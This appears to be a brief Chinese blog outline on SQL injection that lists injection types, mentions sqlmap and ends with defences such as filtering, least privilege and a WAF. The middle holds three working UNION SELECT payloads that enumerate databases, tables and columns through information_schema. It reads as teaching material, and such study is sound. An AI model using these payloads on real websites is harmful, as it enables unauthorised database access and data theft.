注入方式
基于报错注入
基于布尔的盲注
基于时间的盲注
联合查询
内联查询
堆叠的查询
SQL手工注入
为什么要学习手工注入?
1.猜解字段
2.查看当前数据库
3.Union select 1,group_concat(schema_name),3 from information_schema.schemata%23 // 查询所有数据库
4.union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23 //查询数据库中的表
5.UNION SELECT 1,GROUP_CONCAT(column_name),3 FROM information_schema.columns WHERE table_name = 0x7573657273%23 //查询表名中的所有字段
SQLMap工具使用
使用环境: python
http://sqlmap.org
sqlmap常用参数
post如何使用sqlmap注入
如何去防护SQL注入?
cdn隐藏真实ip地址
通过安全函数进行过滤
对数据库最小权限设置
服务器针对性的waf防火墙
原文:https://blog.51cto.com/865516915/2422605